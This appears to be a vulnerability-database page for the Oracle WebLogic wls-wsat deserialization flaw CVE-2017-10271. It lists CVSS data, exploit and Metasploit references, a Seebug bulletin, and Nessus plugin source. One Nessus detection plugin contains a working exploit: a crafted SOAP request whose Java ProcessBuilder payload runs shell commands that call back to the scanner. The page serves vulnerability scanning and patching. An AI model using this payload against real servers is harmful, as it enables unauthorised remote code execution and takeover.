Vulnerabilities > CVE-2017-10271 - Unspecified vulnerability in Oracle Weblogic Server
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
NONE Availability impact
HIGH Summary
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 4 |
Exploit-Db
id EDB-ID:43392 last seen 2018-11-30 modified 2017-12-26 published 2017-12-26 reporter Exploit-DB source https://www.exploit-db.com/download/43392 title Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution description Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit). CVE-2017-10271. Remote exploit for Multiple platform. Tags: Metasplo... file exploits/multiple/remote/43924.rb id EDB-ID:43924 last seen 2018-01-29 modified 2018-01-29 platform multiple port published 2018-01-29 reporter Exploit-DB source https://www.exploit-db.com/download/43924/ title Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit) type remote description Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution. CVE-2017-10271. Remote exploit for Multiple platform file exploits/multiple/remote/43458.py id EDB-ID:43458 last seen 2018-01-24 modified 2018-01-03 platform multiple port published 2018-01-03 reporter Exploit-DB source https://www.exploit-db.com/download/43458/ title Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution type remote
Metasploit
description An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host. id MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE last seen 2020-06-14 modified 2019-05-20 published 2019-04-26 references reporter Rapid7 source https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb title Oracle Weblogic Server Deserialization RCE - AsyncResponseService description The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself. id MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE last seen 2020-06-12 modified 2018-01-18 published 2018-01-05 references reporter Rapid7 source https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb title Oracle WebLogic wls-wsat Component Deserialization RCE
Nessus
NASL family Web Servers NASL id WEBLOGIC_2017_10271.NASL description The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server. last seen 2020-06-01 modified 2020-06-02 plugin id 105484 published 2017-12-28 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105484 title Oracle WebLogic WSAT Remote Code Execution code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(105484); script_version("1.16"); script_cvs_date("Date: 2019/11/08"); script_cve_id("CVE-2017-10271"); script_name(english:"Oracle WebLogic WSAT Remote Code Execution"); script_summary(english:"Sends an HTTP POST request and looks for DNS response"); script_set_attribute(attribute:"synopsis", value: "The remote Oracle WebLogic server is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server."); # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b680917f"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch according to the October 2017 Oracle Critical Patch Update advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-10271"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Oracle WebLogic wls-wsat Component Deserialization RCE'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/17"); script_set_attribute(attribute:"patch_publication_date", value:"2017/10/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/28"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"Web Servers"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("weblogic_detect.nasl"); script_require_keys("www/weblogic"); script_require_ports("Services/www", 80, 7001); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); appname = "Oracle WebLogic Server"; get_kb_item_or_exit("www/weblogic"); port = get_http_port(default:7001, embedded:FALSE); get_kb_item_or_exit("www/weblogic/" + port + "/installed"); # establish if WSAT is enabled. If it isn't then we don't # need to proceed any futher res = http_send_recv3( method:'GET', item:'/wls-wsat/CoordinatorPortType', port:port, exit_on_fail:TRUE); if (empty_or_null(res) || '404' >< res[0]) { audit(AUDIT_INST_VER_NOT_VULN, appname); } # generate a unique pattern for each execution. unixtime() is not # granular enough since there may be many installs and this script # could be running in parallel pattern = hexstr(rand_str(length:8)); # create the HTTP request that will execute the DNS lookup. We'll try to execute # via both cmd and sh since we have no real insight into the remote OS. # Because some minimal Linux installs don't include nslookup, we'll also fallback # on using ping if necessary... although I think that is mostly paranoia. ns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host(); xml_encoded_java = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">' + '<soapenv:Header>' + '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">' + '<java>' + '<void class="java.lang.ProcessBuilder">' + '<array class="java.lang.String" length="3" >' + '<void index="0">' + '<string>cmd.exe</string>' + '</void>' + '<void index="1">' + '<string>/c</string>' + '</void>' + '<void index="2">' + '<string>' + ns_lookup + '</string>' + '</void>' + '</array>' + '<void method="start"/>' + '</void>' + '<void class="java.lang.ProcessBuilder">' + '<array class="java.lang.String" length="3" >' + '<void index="0">' + '<string>/bin/sh</string>' + '</void>' + '<void index="1">' + '<string>-c</string>' + '</void>' + '<void index="2">' + '<string>' + ns_lookup + '</string>' + '</void>' + '</array>' + '<void method="start"/>' + '</void>' + '<void class="java.lang.ProcessBuilder">' + '<array class="java.lang.String" length="3" >' + '<void index="0">' + '<string>/bin/sh</string>' + '</void>' + '<void index="1">' + '<string>-c</string>' + '</void>' + '<void index="2">' + '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' + '</void>' + '</array>' + '<void method="start"/>' + '</void>' + '</java>' + '</work:WorkContext>' + '</soapenv:Header>' + '<soapenv:Body/>' + '</soapenv:Envelope>'; request = 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\n' + 'Host: ' + get_host_ip() + ':' + port + '\r\n' + 'Content-Type: text/xml\r\n' + 'Content-Length: ' + len(xml_encoded_java) + '\r\n' + '\r\n' + xml_encoded_java; soc = open_sock_tcp(port); if (!soc) { audit(AUDIT_SOCK_FAIL, port, appname); } filter = "(ip and udp and port 53 and src host " + get_host_ip() + ") or (icmp and icmp[0] = 8 and src host " + get_host_ip() + ")"; response = send_capture(socket:soc, data:request, pcap_filter:filter); close(soc); if (empty_or_null(response)) { # looks like we didn't execute anything on the host audit(AUDIT_INST_VER_NOT_VULN, appname); } # We can directly search the DNS response if (pattern >!< response) { # maybe this is an ICMP response? icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:"data"))); if (empty_or_null(icmp_data)) { audit(AUDIT_INST_VER_NOT_VULN, appname); } if (pattern >!< icmp_data) { # couldn't find the pattern in the ICMP data audit(AUDIT_INST_VER_NOT_VULN, appname); } } report = '\nNessus was able to exploit a Java deserialization vulnerability by' + '\nsending a crafted Java object.' + '\n'; security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);NASL family Misc. NASL id ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL description The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities last seen 2020-06-01 modified 2020-06-02 plugin id 103935 published 2017-10-18 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103935 title Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(103935); script_version("1.12"); script_cvs_date("Date: 2019/11/12"); script_cve_id( "CVE-2017-10152", "CVE-2017-10271", "CVE-2017-10334", "CVE-2017-10336", "CVE-2017-10352" ); script_bugtraq_id(101304, 101351, 101392); script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)"); script_summary(english:"Checks for the patch."); script_set_attribute(attribute:"synopsis", value: "An application server installed on the remote host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities"); # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1e07fa0e"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch according to the October 2017 Oracle Critical Patch Update advisory."); script_set_attribute(attribute:"agent", value:"all"); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:X"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-10352"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/17"); script_set_attribute(attribute:"patch_publication_date", value:"2017/10/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/10/18"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_weblogic_server_installed.nbin", "os_fingerprint.nasl"); script_require_keys("installed_sw/Oracle WebLogic Server"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("install_func.inc"); app_name = "Oracle WebLogic Server"; install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE); ohome = install["Oracle Home"]; subdir = install["path"]; version = install["version"]; fix = NULL; fix_ver = NULL; # individual security patches if (version =~ "^10\.3\.6\.") { fix_ver = "10.3.6.0.171017"; fix = "26519424"; } else if (version =~ "^12\.1\.3\.") { fix_ver = "12.1.3.0.171017"; fix = "26519417"; } else if (version =~ "^12\.2\.1\.1($|[^0-9])") { fix_ver = "12.2.1.1.171017"; fix = "26519400"; } else if (version =~ "^12\.2\.1\.2($|[^0-9])") { fix_ver = "12.2.1.2.171017"; fix = "26485996"; } if (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1) { os = get_kb_item_or_exit("Host/OS"); if ('windows' >< tolower(os)) { port = get_kb_item("SMB/transport"); if (!port) port = 445; } else port = 0; report = '\n Oracle home : ' + ohome + '\n Install path : ' + subdir + '\n Version : ' + version + '\n Required Patch : ' + fix + '\n'; security_report_v4(extra:report, port:port, severity:SECURITY_HOLE); } else audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);
Packetstorm
| data source | https://packetstormsecurity.com/files/download/146143/oracle_weblogic_wsat_deserialization_rce.rb.txt |
| id | PACKETSTORM:146143 |
| last seen | 2018-01-29 |
| published | 2018-01-28 |
| reporter | Alexey Tyurin |
| source | https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html |
| title | Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution |
Saint
| bid | 101304 |
| description | Oracle WebLogic Server WLS Security Component Deserialization Vulnerability |
| id | web_dev_weblogic |
| title | weblogic_wls_security_component_deserialization |
| type | remote |
Seebug
| bulletinFamily | exploit |
| description | ### 漏洞描述 黑客利用WebLogic 反序列化漏洞(CVE-2017-3248)和WebLogic WLS 组件漏洞(CVE-2017-10271)对企业服务器发起大范围远程攻击,有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视。其中,CVE-2017-10271是一个最新的利用Oracle WebLogic中WLS 组件的远程代码执行漏洞,属于没有公开细节的野外利用漏洞,大量企业尚未及时安装补丁。官方在 2017 年 10 月份发布了该漏洞的补丁。 该漏洞的利用方法较为简单,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限,危害巨大。由于漏洞较新,目前仍然存在很多主机尚未更新相关补丁。预计在此次突发事件之后,很可能出现攻击事件数量激增,大量新主机被攻陷的情况。 攻击者能够同时攻击Windows及Linux主机,并在目标中长期潜伏。由于Oracle WebLogic的使用面较为广泛,攻击面涉及各个行业。此次攻击中使用的木马为典型的比特币挖矿木马。但该漏洞可被黑客用于其它目的攻击。 ### 影响版本 * Oracle Weblogic Server 10.3.6.0 * Oracle Weblogic Server 12.2.1.2 * Oracle Weblogic Server 12.2.1.1 * Oracle Weblogic Server 12.1.3.0 |
| id | SSV:97009 |
| last seen | 2018-06-26 |
| modified | 2017-12-22 |
| published | 2017-12-22 |
| reporter | My Seebug |
| source | https://www.seebug.org/vuldb/ssvid-97009 |
| title | Oracle WebLogic wls-wsat RCE(CVE-2017-10271) |
The Hacker News
| id | THN:F03064A70C65D9BD62A8F5898BA276D2 |
| last seen | 2018-04-18 |
| modified | 2018-04-18 |
| published | 2018-04-17 |
| reporter | Mohit Kumar |
| source | https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html |
| title | Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners |